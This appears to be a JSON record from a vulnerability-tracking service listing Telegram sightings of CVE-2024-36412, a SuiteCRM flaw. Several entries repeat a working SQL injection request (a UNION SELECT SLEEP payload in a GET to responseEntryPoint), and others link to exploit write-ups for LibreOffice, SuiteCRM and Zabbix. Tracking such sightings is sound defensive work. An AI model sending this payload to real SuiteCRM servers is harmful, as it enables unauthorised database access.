{"vulnerability": "CVE-2024-36412", "sightings": [{"uuid": "b9b797f3-8db7-4cf1-b585-f6d5ef381dfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1292", "content": "SuiteCRM CVE-2024-36412\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-17T16:15:23.000000Z"}, {"uuid": "050a3493-7b40-4ae3-bfea-47081fc55237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "seen", "source": "MISP/71f05cce-2beb-4b80-8496-bbbabc032544", "content": "", "creation_timestamp": "2025-08-25T18:31:44.000000Z"}, {"uuid": "08834a4b-74bb-40e6-9649-80c962314092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/2471", "content": "#exploit\n1. CVE-2024-12425,\nCVE-2024-12426:\nLibreOffice Path Traversal\nhttps://codeanlabs.com/blog/general/exploiting-libreoffice-cve-2024-12425-and-cve-2024-12426\n\n2. CVE-2024-36412:\nUsing XSS filters against XSS filters - Unexpected SQLI/RCE\nhttps://secarius.fr/cves/cve_2024_36412_using_filters_against_filters_unexpected_sql_injection\n\n3. CVE-2024-42327:\nZabbix Privilege Escalation -&gt; RCE\nhttps://github.com/godylockz/CVE-2024-42327", "creation_timestamp": "2025-02-20T05:23:47.000000Z"}, {"uuid": "0e4ec371-a7dd-45e4-9150-2e54738e6635", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/6704", "content": "#exploit\n1. CVE-2024-12425,\nCVE-2024-12426:\nLibreOffice Path Traversal\nhttps://codeanlabs.com/blog/general/exploiting-libreoffice-cve-2024-12425-and-cve-2024-12426\n\n2. CVE-2024-36412:\nUsing XSS filters against XSS filters - Unexpected SQLI/RCE\nhttps://secarius.fr/cves/cve_2024_36412_using_filters_against_filters_unexpected_sql_injection\n\n3. CVE-2024-42327:\nZabbix Privilege Escalation -&gt; RCE\nhttps://github.com/godylockz/CVE-2024-42327", "creation_timestamp": "2025-02-20T05:23:47.000000Z"}, {"uuid": "7d55c343-1120-473a-80ac-69ea6f8838d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "exploited", "source": "https://t.me/CNArsenal/2800", "content": "SuiteCRM CVE-2024-36412\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-18T03:29:02.000000Z"}, {"uuid": "dae69972-0b5f-4b33-a5da-f0bd6f571102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/13806", "content": "SuiteCRM CVE-2024-36412\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-17T16:15:23.000000Z"}, {"uuid": "31317e0d-d76f-4349-978a-00ccdf4c3a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/jj_8tl/65", "content": "CVE ID : CVE-2024-36412\nSystem : SuiteCRM\nType : SQL injectiton\n\nExploit :\n\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1", "creation_timestamp": "2024-11-24T14:18:40.000000Z"}, {"uuid": "72087f52-00d5-4836-b63b-40a98d3cd986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/openSource3/344", "content": "CVE ID : CVE-2024-36412\nSystem : SuiteCRM\nType : SQL injectiton\n\nExploit :\n\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1", "creation_timestamp": "2024-09-17T07:32:14.000000Z"}, {"uuid": "3c1e8138-9b33-436f-bbc4-58c8e3018c1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/143160", "content": "SuiteCRM CVE-2024-36412\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-17T15:58:21.000000Z"}, {"uuid": "b661bae8-7f72-47a9-bdc9-1fc9e6c72397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/424", "content": "SuiteCRM CVE-2024-36412\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-17T15:58:21.000000Z"}, {"uuid": "fd9c984e-3648-49f8-a55e-d4a0dfae8908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "exploited", "source": "https://t.me/fattahh_ir/2220", "content": "SuiteCRM CVE-2024-36412\n\nGET /index.php?entryPoint=responseEntryPoint&amp;event=1&amp;delegate=a&lt;\"+UNION+SELECT+SLEEP(5);--+-&amp;type=c&amp;response=accept HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-19T16:56:34.000000Z"}, {"uuid": "7df44d6c-6c6f-433d-aa79-f3313be1a4ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36412", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11819", "content": "#exploit\n1. CVE-2024-12425,\nCVE-2024-12426:\nLibreOffice Path Traversal\nhttps://codeanlabs.com/blog/general/exploiting-libreoffice-cve-2024-12425-and-cve-2024-12426\n\n2. CVE-2024-36412:\nUsing XSS filters against XSS filters - Unexpected SQLI/RCE\nhttps://secarius.fr/cves/cve_2024_36412_using_filters_against_filters_unexpected_sql_injection\n\n3. CVE-2024-42327:\nZabbix Privilege Escalation -&gt; RCE\nhttps://github.com/godylockz/CVE-2024-42327", "creation_timestamp": "2025-02-17T01:32:28.000000Z"}]}